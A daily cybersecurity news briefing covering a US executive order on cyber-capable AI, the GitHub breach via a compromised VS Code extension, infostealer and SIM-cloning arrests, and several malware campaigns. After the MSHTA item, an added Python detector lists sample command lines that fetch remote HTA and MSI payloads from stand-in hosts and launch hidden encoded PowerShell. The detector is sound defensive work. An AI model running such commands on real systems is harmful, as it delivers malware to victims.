Trump prepares to sign AI cyber order today amid Mythos alarm
Cybercom to speed AI tools use, Hacker accessed GitHub repos via TanStack-compromised Nx Console VS Code extension, Ukraine cops bust 18-year-old for running infostealer op, S. Korean cops bust 32 for stealing bigwigs' financial data and PII, Microsoft issues patches for Defender flaws, much more

Metacurity is the only daily cybersecurity briefing built for clarity, not agendas—no vendor spin, no echo chamber, just sharp, original aggregation and analysis of what actually matters to security leaders.
The Trump administration is preparing to unveil a major new artificial intelligence and cybersecurity executive order at a White House ceremony today, which is expected to include some of the nation’s most powerful AI executives.
The order would create a broad voluntary framework allowing the federal government to test advanced AI systems before public release, particularly models capable of conducting sophisticated cybersecurity tasks such as identifying network vulnerabilities, assisting with exploit development, or accelerating cyber defense operations.
At the center of the administration’s urgency is Anthropic’s powerful new Mythos model, which triggered alarm across Washington after demonstrating an unprecedented ability to locate flaws in computer systems and critical infrastructure networks. The concerns deepened after OpenAI released GPT-5.5-Cyber, a similarly advanced cyber-focused model designed for defensive security operations.
Rather than imposing mandatory federal approval of advanced AI systems — something many Silicon Valley executives fiercely oppose — the draft order instead establishes what officials describe as a voluntary review structure. Developers would be encouraged to provide the government access to certain frontier models as much as 90 days before public deployment. Participating companies would also be asked to allow selected critical infrastructure organizations, including banks, utilities, and hospitals, to evaluate the systems before broader release.
The proposal reflects a dramatic evolution in the Trump administration's thinking on AI. Earlier in Trump’s second term, the White House aggressively emphasized deregulation and innovation, positioning itself against heavy-handed oversight of the technology. But the rapid emergence of frontier cyber-capable AI systems has intensified fears inside both the intelligence community and parts of Trump’s political coalition that the technology could outpace existing safeguards.
Some officials and industry allies pushed for a hands-off approach intended to preserve America’s competitive edge against China. Others argued the government needed far greater visibility into models that could potentially threaten financial systems, telecommunications networks, and national infrastructure.
The resulting executive order appears to divide responsibilities across a sprawling coalition of agencies. The Treasury Department would lead a voluntary vulnerability-sharing partnership between AI developers and critical infrastructure operators. The Cybersecurity and Infrastructure Security Agency, Office of the National Cyber Director, and National Security Agency would support the effort.
Meanwhile, the NSA is expected to assume perhaps the most sensitive role: conducting or overseeing classified evaluations of frontier AI systems before release.
The order reportedly directs agencies, including Treasury, CISA, and the National Institute of Standards and Technology, to establish a classified benchmarking process within 60 days to determine what qualifies as a “covered frontier model.” Final determinations would ultimately rest with the NSA in consultation with other agencies.
The administration also plans an aggressive timetable. The Pentagon would receive 30 days to secure telecommunications and information systems, while federal agencies would simultaneously push wider AI adoption across government operations and critical infrastructure sectors.
For now, the administration is framing the initiative as cooperative rather than coercive. But the order marks a clear acknowledgment that frontier AI is no longer viewed solely as a commercial technology race. (Jacob Wendler, Dana Nickel, Dasha Burns, and John Hewitt Jones / Politico, Maggie Eastland, Oma Seddiq (BGOV), and Courtney Subramanian / Bloomberg, Karen Freifeld, Courtney Rozen, and Jarrett Renshaw / Reuters, and Alexandra Kelley and David DiMolfetta / NextGov/FCW)
Related: CNN, The Information
Sources say the Pentagon’s cyber-warfighting arm, US Cyber Command, is launching a task force to speed up the adoption of cutting-edge artificial intelligence tools with powerful hacking capabilities.
The initiative from Cybercom underscores the Pentagon’s concerns about the sudden emergence of private sector-built AI models that can unearth security flaws in digital systems faster than the world’s best hackers.
The task force was announced to staff two weeks ago by Gen. Joshua Rudd, the dual-hat leader of the National Security Agency and Cyber Command, according to an internal email.
According to the email, the task force will span Cyber Command and the NSA, and will study how the Pentagon can safely deploy leading AI models in all aspects of its missions, the two people said. This includes assessing how AI models built by Silicon Valley tech giants can be used on “high-side” systems bearing some of the intelligence community’s most sensitive secrets. (John Sakellariadis, Maggie Miller, and Jacob Wendler / Politico)
Related: The Information

GitHub says the hackers who breached 3,800 internal repositories gained access via a malicious version of the Nx Console VS Code extension, compromised in last week's TanStack npm supply-chain attack.
This attack is attributed to the TeamPCP threat group and began with the compromise of dozens of TanStack and Mistral AI npm packages, then quickly extended to other projects (including UiPath, Guardrails AI, and OpenSearch) using stolen CI/CD credentials.
TeamPCP was linked to other major supply chain attacks targeting developer code platforms, including PyPI, NPM, GitHub, and Docker, and, more recently, to the "Mini Shai-Hulud" supply chain campaign (which also affected two OpenAI employees).
GitHub CISO Alexis Wales said the breach involved a malicious version of Nx Console, the official Visual Studio Code marketplace extension for Nx, that allows developers to manage large repos and multi-project codebases without relying entirely on complex Terminal CLI commands.
While GitHub has yet to attribute the attack to a specific hacking group or threat actor, the TeamPCP cybercrime gang claimed access to GitHub source code and "~4,000 repos of private code" on the Breached forum on Tuesday, and is now asking for at least $50,000 for the stolen data. (Sergiu Gatlan / Bleeping Computer)
Related: GitHub, Bleeping Computer, Grafana

The Ukrainian cyberpolice, working in conjunction with US law enforcement, has identified an 18-year-old man from Odesa suspected of running an infostealer malware operation targeting users of an online store in California.
According to the police, the threat actor used information-stealing malware between 2024 and 2025 to infect users’ devices and steal browser sessions and account credentials.
The attacks linked to the young hacker impacted 28,000 customer accounts, of which the cybercriminals used 5,800 to make unauthorized purchases totaling about $721,000. The malicious operation caused $250,000 in direct losses, including chargebacks.
“The information was then processed and sold through specialized online resources and Telegram bots.”
The police say the suspect engaged in cryptocurrency transactions with his accomplices. (Bill Toulas / Bleeping Computer)
Related: Cyberpolice.gov.ua, The Cyber Express

South Korean police announced they had apprehended an international hacking organization responsible for stealing financial and personal information from conglomerate chairpersons, BTS members, and others through SIM cloning and unauthorized activation of budget mobile carriers.
The group targeted wealthy individuals with assets ranging from hundreds of billions to trillions of Korean won, extorting 48.4 billion won from 28 victims. The two Chinese masterminds were arrested in Thailand and extradited to South Korea for detention, with most of the organization’s members also captured.
The Seoul Metropolitan Police Agency’s cyber investigation team stated, “From May 2022 to April of last year, we arrested 32 members of an international hacking group that hacked multiple government, public, and private websites to steal financial and personal data and embezzle assets.” Ten key members, including the two leaders, A and B, were indicted or are set for indictment.
The group specifically targeted BTS’s Jung Kook, chairpersons and executives of top 100 conglomerates, and wealthy individuals residing overseas, recently deceased, or imprisoned. They exploited the difficulty these victims faced in responding immediately to breaches in non-face-to-face authentication systems. (Bang Geuk-ryeol / The Chosun Daily)
Related: Chosun Biz, Maeil Business
Microsoft started rolling out security patches for two Defender vulnerabilities that have been exploited in zero-day attacks.
The first one, tracked as CVE-2026-41091, is a privilege escalation security flaw affecting Microsoft Malware Protection Engine 1.1.26030.3008 and earlier, which provides the scanning, detection, and cleaning capabilities for Microsoft antivirus and antispyware software.
This flaw stems from an improper link resolution before file access (link following) weakness, which allows attackers to gain SYSTEM privileges.
A second vulnerability (CVE-2026-45498) affects systems running the Microsoft Defender Antimalware Platform 4.18.26030.3011 and earlier, a collection of security tools also used by Microsoft's System Center Endpoint Protection, System Center 2012 R2 Endpoint Protection, System Center 2012 Endpoint Protection, and Security Essentials.
According to Microsoft, successful exploitation enables threat actors to trigger denial-of-service (DoS) states on unpatched Windows devices.
Related: Help Net Security, HKCERT
Researchers at ReliaQuest report that threat actors brute-forced VPN credentials and bypassed multi-factor authentication (MFA) on SonicWall Gen6 SSL-VPN appliances to deploy tools used in ransomware attacks.
During the intrusions, the hacker took between 30 and 60 minutes to log in, do network reconnaissance, test credential reuse on internal systems, and log out.
SonicWall warned in a security advisory for CVE-2024-12802 that installing the firmware update alone on Gen6 devices does not fully mitigate the vulnerability, and a manual reconfiguration of the LDAP server is required. Failing to do so leaves open the possibility of bypassing MFA protection.
The researchers noted that, in the environments they investigated, the devices appeared to be patched because they were running the updated firmware, yet they remained vulnerable because the required remediation steps had not been completed.
ReliaQuest says that in one incident, the hacker gained access to the internal network and reached a domain-joined file server in as little as half an hour. Then they established a remote connection over RDP using a shared local administrator password.
The researchers found that the attacker tried to deploy a Cobalt Strike beacon, a post-exploitation framework for command-and-control (C2) communication, and a vulnerable driver, likely to disable endpoint protection using the Bring Your Own Vulnerable Driver (BYOVD) technique.
However, the installed endpoint detection and response (EDR) solution blocked the beacon and the loading of the driver. (Bill Toulas / Bleeping Computer)
Related: ReliaQuest, CyberPress, SonicWall

Sophos researchers observed a new ransomware variant called WantToCry, which, thanks to its encryption mechanism, is a lot more difficult to spot than traditional encryptors.
Sophos said the attackers would first use scanners such as Shodan or Censys to look for internet-connected devices using the Server Message Block (SMB) service.
SMB is a network file-sharing protocol that lets computers access files and other resources over a local network as if they were on their own system. It is widely used in Microsoft Windows environments to enable shared drives and network authentication, and allows applications to manipulate files on remote servers.
After finding SMB services with open TCP ports 139 and 445, they would try default, frequently used, and otherwise weak credentials until they worked and granted access.
However, once inside, WantToCry doesn’t do what encryptors usually do and lock down files locally. Instead, the attackers first exfiltrate the files and perform the encryption on a remote server. They then write the encrypted files back to the victim devices, overwriting the originals and rendering them useless without the decryption key. (Sead Fadilpašić / TechRadar)
Related: Sophos, SC Media, Cyber Press

Researchers at Bitdefender have, since the start of this year, detected a dramatic rise in malicious activity related to MSHTA (Microsoft HTML Application).
One common use involved the HTA CountLoader, which delivers the Lumma and Amatera stealers. In one Lumma campaign, victims were targeted through messages, social media posts, or SEO-poisoned websites that promise free or cracked software.
If successfully phished, the victim would execute a setup file, which is really a Python interpreter, and load the Python runtime. The downloaded ‘free software’ archive includes all the necessary scripts together with an MSHTA executable to contact the attacker’s C2 and retrieve the HTA loader.
The HTA then decodes the next payload and launches it. This downloads and executes the stealer.
The Emmenhtal loader was also observed delivering Lumma and other stealers. This campaign started with phishing messages via Discord. The victim is lured to a page designed to hijack the clipboard and trick the user into executing a malicious command line as part of a fake human verification process. If the user is then persuaded to press Win + R to open the Run dialog, followed by Ctrl + V and Enter to paste and execute the command, explorer.exe appears to launch MSHTA legitimately.
Other MSHTA-driven campaigns have included the delivery of ClipBanker and PurpleFox. ClipBanker is a malware family primarily designed to replace wallet addresses in the clipboard to steal cryptocurrency. “In this infection chain, MSHTA is used as an early-stage execution mechanism that launches a remote HTA and quickly transitions to PowerShell-based persistence and payload delivery,” explains Bitdefender.
PurpleFox is a more advanced and persistent malware family that has been active since 2018. “One of its long-standing delivery methods, however, has remained consistent: launching msiexec from an MSHTA command line in order to download and execute an MSI package disguised as a .png file,” says Bitdefender. (Kevin Townsend / Security Week)
Related: Bitdefender, Cyber Press, GBHackers, TechRadar
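For defenders, the MSHTA chains described above can be expressed as parent/child process rules. The following is an added example, not code from Bitdefender or this briefing: it triages constructed process-creation events, and the field names, rule names, parent process names and `.test` hosts are all assumptions made for illustration.

```python
import re

# Constructed process-creation events (parent image, image, command line).
# Hosts use the reserved .test TLD; none of these values come from the article.
EVENTS = [
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta https://verify.example.test/check.hta"},
    {"parent": "python.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://cdn.example.test/l.hta"},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -enc <constructed>"},
    {"parent": "mshta.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /i http://img.example.test/logo.png /q"},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\inventory.hta"},
]

URL = re.compile(r"https?://\S+", re.I)

def base(path):
    """Lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of rule names an event matches (empty if no rule fires)."""
    parent, image = base(event["parent"]), base(event["image"])
    url = URL.search(event["cmdline"])
    hits = []
    if image == "mshta.exe" and url:
        hits.append("mshta_remote_hta")
        if parent == "explorer.exe":        # Run-dialog paste looks like this
            hits.append("explorer_parent_remote_hta")
        elif parent in ("python.exe", "pythonw.exe"):
            hits.append("python_spawned_mshta")
    if parent == "mshta.exe" and image in ("powershell.exe", "pwsh.exe"):
        hits.append("mshta_to_powershell")
    if parent == "mshta.exe" and image == "msiexec.exe" and url:
        hits.append("mshta_to_msiexec_remote")
        if re.search(r"\.(png|jpe?g|gif)$", url.group().split("?")[0], re.I):
            hits.append("msi_disguised_as_image")
    return hits

def triage(events):
    """Map event index -> matched rules, skipping events with no hits."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

if __name__ == "__main__":
    for idx, rules in triage(EVENTS).items():
        print(idx, EVENTS[idx]["cmdline"], "->", ", ".join(rules))
```

The last constructed event, a local HTA opened from explorer.exe, matches no rule, which is the baseline these rules need to stay quiet on.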

Team Europe notched its fifth first-place win at this year's International Cybersecurity Challenge, which was hosted in Brisbane, Australia.
Team USA came in second, while Team Oceania secured the third-place win.
As a global Capture the Flag (CTF) event, the International Cybersecurity Challenge (ICC) is designed to encourage the development of cybersecurity skills and to foster international cooperation. The format of the event, with teams made up of nationalities from all over the world, allows team members to experience cultural differences and learn to cooperate efficiently to achieve their goals.
The ICC was originally launched and led by the European Union Agency for Cybersecurity (ENISA) in 2022. (ENISA)
Related: ABC.net.au, MediaNet
Socket Security raised $60 million in a Series C venture funding round.
Thrive Capital led the round with participation from Andreessen Horowitz, Abstract Ventures, and Capital One Ventures. (Dina Bass / Bloomberg)
Related: Socket
Best Thing of the Day: Bit by Bit, Step by Step
As tensions between Donald Trump and Europe continue to simmer, the continent is accelerating its moves to reduce its addiction to US technology.
Bonus Best Thing of the Day: Not That Musk Cares, But It's Still a Victory
An Australian court upheld a regulator's fine against Elon Musk's social media company X Corp after it admitted violating the law by failing to supply information about its online child protection measures, ending a nearly three-year dispute.
Worst Thing of the Day: The World's Second-Worst Person Will Likely Become the World's First Trillionaire
Elon Musk has the potential to become the world's first trillionaire now that SpaceX, which also owns Starlink and xAI, has filed to go public.
